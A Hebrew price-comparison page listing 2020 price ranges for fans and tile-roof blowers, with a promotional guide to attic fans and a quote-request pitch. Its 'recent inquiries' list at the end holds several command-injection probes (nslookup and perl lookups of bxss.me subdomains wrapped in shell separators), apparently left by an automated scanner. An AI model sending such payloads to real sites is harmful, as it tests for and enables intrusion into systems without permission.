בקש הצעת מחיר בקליק עבור מפוחים

מחירון מפוחים

מחפש לדעת כמה עולה מפוח גג רעפים? איזה סוגי מפוחים יש לגג רעפים?

 

 

כמה עולה מפוח גג רעפים?

כמה עולה

 

ברוכים הבאים לאתר כמה עולה, ריכזנו עבורכם מחירון מפוח גג רעפים מעודכן לשנת 2020 ולאחריו מדריך צרכנות נבונה בשם : מדריך מפוח לגג רעפים.

 

המחירון נכתב ע"י צוות אתר כמה עולה, כל המחירים נאספו על ידנו מאתרי אינטרנט של חברות המשווקות מפוחים לגג רעפים בישראל, מדובר על טווח מחירים מהזול ביותר ועד למחיר היקר ביותר לאותו שירות.

 

ייעוץ והצעת מחיר למפוחי גג ללא עלות וללא התחייבות!

חוסכים לך זמן וכסף!

 

באתרנו שירות החוסך את הצורך לחפש מפוח גג רעפים, שירות בקש הצעת מחיר הינו ללא עלות וללא התחייבות, משאירים את הפרטים כאן באתר ועד 3 חברות למכירה והתקנה של מפוחי גג מומלצים גולשי אתר כמה עולה שירות 10 יחזרו אליכם טלפונית לייעוץ והצעות מחיר, בדרך זו תקבלו תשובות לכל שאלה שיש לכם ועל הדרך תעשו גם השוואת מחירים.

 

סוגי מפוחים

מחירון מומלץ

מחירון מפוחים עודכן בתאריך 18.11.20

ט.ל.ח

 

טווחי מחירים מפוחים


מפוח צנטרפוגלי למטבח
בייתי עם מסנן  - 850-1,350 ש"ח + מע"מ

מפוח צנטרפוגלי למטבח
בייתי תעשייתי -  780-5,600 ש"ח + מע"מ

מפוח צנטרפוגלי מאיץ כפות קדימה
2,100-4,500 ש"ח + מע"מ

מפוח צנטרפוגלי מאיץ כפות אחורה
3,500-8,500 ש"ח + מע"מ

מפוחי צינור צנטרפוגליים
650-1,350 ש"ח + מע"מ

מפוחי צינור ציריים שקטים
200-2,000 ש"ח + מע"מ

מפוחי לחץ גבוה
2,100-6,700 ש"ח + מע"מ

מפוחים יעודיים לאוורור שרותים מבחוץ
1,750-2,000 ש"ח + מע"מ

מפוחים יעודיים לאוורור מקלחות מבחוץ
1,750-2,000 ש"ח + מע"מ

מפוחים יעודיים לאוורור חדרי ארונות מבחוץ
1,750-2,000 ש"ח + מע"מ

מפוחים יעודיים לאוורור מטבחים מבחוץ
1,750-2,000 ש"ח + מע"מ

מפוחי גגות לבית ולתעשייה
1,000-8,000 ש"ח + מע"מ

 

 

מדריך מפוח לגג רעפים


חשבון החשמל שוב מגיע, ואתם מביטים זה בזו המומים. איך יכול להיות שהגענו לסכום כזה החודש, אתם שואלים את עצמכם, נבוכים ומבולבלים. ניסינו הרי לכבות את האורות בכל החדרים שלא שהינו בהם, בקושי ראינו טלוויזיה, בעצם היינו בבית רק בלילה... רגע, אתם נזכרים, אולי החשבון הגיע לסכום כל כך גבוה כי בכל לילה הדלקנו מזגן?

למען האמת סביר להניח שגם אם הייתם בבית מן הבוקר עד הערב והשתמשתם בכל מוצרי החשמל האפשריים, ה'זללן' העיקרי שגרם לחשבון החשמל שלכם להתנפח הוא המזגן. מה אפשר לעשות במצב כזה? ניתן כמובן לנסות לחסוך, לכבות ולהדליק כדי למנוע מצב בו המזגן פועל במשך כמה שעות ארוכות. אפשר גם לקנות מאווררים טובים שיפיחו משב רוח נעים בתוך הבית. אבל ישנו פתרון נוסף, בעל יתרונות רבים, שמומלץ מאוד לחשוב עליו: מפוח לגג רעפים.

 

כיצד המפוח עובד?

 

המפוח עובד על עיקרון פשוט, אך עושה זאת בצורה מתוחכמת מאוד. בגג שלכם נאגרת בקיץ כמות מכובדת של אוויר חם. אוויר חם, כידוע, גורם להתחממות, ועל כן כל הבית שלכם הופך לאט לאט להיות רותח יותר ויותר... מפוח לגג רעפים לוקח, בעצם, את כל האוויר החם, ופולט אותו החוצה בצורה יעילה. הדבר גורם לבית להתקרר ולהיות נעים בהרבה.

 

יתרונות בעבודת מפוח גג לרעפים

 

מדובר בפתרון שיש לו כמה יתרונות. החסכון הגדול בחשמל לא מועיל רק לכיס שלכם, אלא גם לכדור הארץ שלנו, שכל צמצום בצריכת החשמל הוא ברכה עבורו. שנית, נעים הרבה יותר לשהות בבית קר ולא בבית מקורר. כאשר יושבים במזגן לאורך זמן השרירים מתחילים להיתפס, מתחיל להיות קר מדי ונוצרת תחושה לא נעימה. שימוש במפוח פשוט הופך את הבית לנעים יותר, כאילו יום אביב בחוץ.

מפוח לגג רעפים מתאים לכם אם אתם גרים בבית פרטי שיש לו גג מסוג זה, או אם הדירה שלכם נמצאת בקומה העליונה. חשוב לבדוק ולנסות לברר מראש האם פתרון כזה אכן יכול להועיל לכם. בדקו שאתם פונים לחברה מקצועית ובעלת ניסיון בתחום, שתבצע את העבודה על הצד הטוב ביותר!

 

טיפים עבור מפוח גג רעפים

 

הקיץ מגיע, ואיתו גלידות, ים, קרם שיזוף והרבה כיף. לצד הדברים המהנים והטובים האלו, יגיע איתו גם גל חום גדול, שיגרום לנו להתגעגע לגשם, לרוחות ואפילו לקצת שלג... ישנן דרכים רבות להתמודד עם חום-החל ממאווררים איכותיים שמביאים איתם משב רוח כליל, דרך מזגנים שהופכים כל דירה תל אביבית לחדר באנטרטיקה, וכלה בטכנולוגיה מוכרת פחות אך יעילה בצורה מפתיעה: מפוח גג רעפים.

גגות רעפים אוגרים בתוכם חום רב בקיץ. השמש קופחת עליהם והם מתחממים (מעט דומה לעקרון של דוד שמש- מה שקולט חום גם מחמם את מה שבתוכו). זוהי אחת הסיבות שלעיתים, בחודשי יולי-אוגוסט, נעים יותר אפילו להיות בחוץ מאשר להיות בבית לא ממוזג. מפוח לגג רעפים שואב את האוויר החם מחלל הגג, וכך בעצם הופך את הבית כולו לקריר ונעים יותר. ניתן להפעיל את המפוח גם בחורף, ואז הוא שואב החוצה את הלחות. עם זאת עיקר תפקידו הוא בימות השנה החמים יותר.

בשנים האחרונות ישנה מודעות רבה יותר לנזק הסביבתי שגורמת צריכת חשמל רבה. רבים מאיתנו מנסים לא להשאיר אורות מיותרים דולקים, לא להשתמש במוצרי חשמל מעבר למה שצריך, ולהיות 'ירוקים' יותר משהיינו בעבר. מזגן צורך כמויות עצומות של חשמל, ועל כן כל הפעלה שלו כרוכה בבזבוז אנרגיה רבה. כמו כן, למפוח ישנו גם יתרון כלכלי- רובנו מקבלים את החשבון החודשי שלנו מחברת החשמל ותופסים את הראש בזעזוע, בדרך כלל. בחודשי הקיץ הדבר מחמיר אף יותר, ועל כן מפוח לגג רעפים עשוי להיות דרך מצוינת להקל קצת על הכיס שלכם...

כמו כן, ישנם אנשים רבים שלא אוהבים לשהות במזגן. אמנם מדובר בדרך מצוינת להזיע פחות, אך פעמים רבות מדובר בקור עז שגורם לנו לחוש התכווצות שרירים או להצטנן (במיוחד אם מדובר בשינה במזגן, שאחריה רבים קמים עם אף אדום, גב תפוס וגרון כואב...). מפוח טוב פותר את הבעיה הזו- אין תהליך של החדרת קור הביתה אלא של סינון החום מתוכו, דבר נעים יותר לכל הדעות.

 

הבהרה

 

מחירי מפוחי גג עבור רעפים משתנים באופן תדיר ולכן המחירון המומלץ הוא בעיקר אינדקצייה למחירי השוק בישראל, כאן באתר כמה עולה ניתן לקבל הצעות מחיר אמיתיות ומחייבות ממשווקי מפוחי גג רעפים מומלצים ע"י גולשי האתר, לצורך כך יש למלא את טופס הבקשה להצעת מחיר ונותני שירות מובילים מאזור מגוריכם יחזרו אליכם טלפונית לייעוץ והצעת מחיר לא מחייבת.

פניות אחרונות
;(nslookup hitlmjyfkkqnqcb850.bxss.me||perl -e "gethostbyname('hitlmjyfkkqnqcb850.bxss.me')")|(nslookup hitlmjyfkkqnqcb850.bxss.me||perl -e "gethostbyname('hitlmjyfkkqnqcb850.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:22
`(nslookup hityrthinndwn6a237.bxss.me||perl -e "gethostbyname('hityrthinndwn6a237.bxss.me')")`
שדה תעופה בן גוריון
11/08/2022 16:28:21
|(nslookup hitwvdhefoscga115b.bxss.me||perl -e "gethostbyname('hitwvdhefoscga115b.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:21
/xfs.bxss.me
שדה תעופה בן גוריון
11/08/2022 16:28:20
$(nslookup hitrhfllscjir6fc87.bxss.me||perl -e "gethostbyname('hitrhfllscjir6fc87.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:20
(nslookup hityyyjpyvfnm42e80.bxss.me||perl -e "gethostbyname('hityyyjpyvfnm42e80.bxss.me')")
שדה תעופה בן גוריון
11/08/2022 16:28:20